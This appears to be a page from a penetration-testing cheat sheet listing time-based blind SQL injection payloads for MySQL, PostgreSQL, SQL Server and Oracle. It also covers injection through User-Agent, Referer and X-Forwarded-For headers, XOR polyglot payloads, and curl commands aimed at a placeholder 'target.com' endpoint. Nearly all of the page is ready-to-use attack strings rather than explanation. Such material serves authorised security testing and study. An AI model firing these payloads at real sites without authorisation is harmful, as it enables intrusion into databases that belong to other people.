Time-Based Blind SQL Injection Payloads

Using Time-Based Blind SQL Injection Payloads

Time delays are effective for blind SQLi detection when no error messages are shown. Here are payloads for different databases:

MySQL

Copy-- Basic time-based delay
SELECT SLEEP(10);

-- Inline injection with logic
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

-- Using benchmark for delay (CPU-based)
1 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT(FLOOR(RAND()*2),(SELECT SLEEP(5))) AS x FROM information_schema.tables GROUP BY x) y);

-- Boolean logic delay
' OR IF(1=1, SLEEP(10), 0)-- -

PostgreSQL

Copy-- Standard time-based delay
SELECT pg_sleep(10);

-- Conditional delay with string concatenation
' OR (CASE WHEN ((CLOCK_TIMESTAMP() - NOW()) < interval '0:0:10') 
     THEN (SELECT '1' || pg_sleep(10)) ELSE '0' END)='1

-- More concise version
' OR 1=1; SELECT pg_sleep(5);-- 

-- Using random() for variability
' OR (SELECT CASE WHEN (random() < 0.5) THEN pg_sleep(5) ELSE pg_sleep(0) END);--

Microsoft SQL Server

Copy-- Basic delay
WAITFOR DELAY '00:00:10';

-- Inline SQLi payload
'; WAITFOR DELAY '00:00:05'; --

-- Conditional delay
IF (1=1) WAITFOR DELAY '0:0:10';

-- Using IF EXISTS for more realism
'; IF EXISTS (SELECT * FROM users) WAITFOR DELAY '00:00:07';--

Oracle

Copy-- Basic time delay using DBMS_PIPE
BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;

-- SQLi inline payload
' OR 1=1; BEGIN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END;--

-- Conditional check with delay
DECLARE v INTEGER; BEGIN IF 1=1 THEN DBMS_PIPE.RECEIVE_MESSAGE('a',10); END IF; END;

Header-Based SQLi Testing

Some endpoints reflect headers like User-Agent, Referer or X-Forwarded-For. Inject payloads there:

examples:

CopyUser-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'"

Using curl to confirm time delays:

Copytime curl -s -H "User-Agent: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"

time curl -s -H "X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z" "https://target.com/vulnerable-endpoint"

time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'\"" "https://target.com/vulnerable-endpoint"

Mastering XOR-Based SQL Injection Techniques

Explore how XOR logic in SQL payloads like if(now()=sysdate(),sleep(10),0) can be weaponized for bypassing filters and triggering precise time-based detection.

using xor pollyglots:

Copyif(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/

test using curl

Copytime curl "https://target.com/page.php?id=if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/"

If the server takes approximately 10 seconds to respond, it strongly indicates a time-based SQL injection vulnerability.

PreviousTime Based SQL Injection NextError-based Fingerprinting

Last updated 1 month ago

hashtagUsing Time-Based Blind SQL Injection Payloads

hashtagHeader-Based SQLi Testing

hashtagMastering XOR-Based SQL Injection Techniques

Using Time-Based Blind SQL Injection Payloads

Header-Based SQLi Testing

Mastering XOR-Based SQL Injection Techniques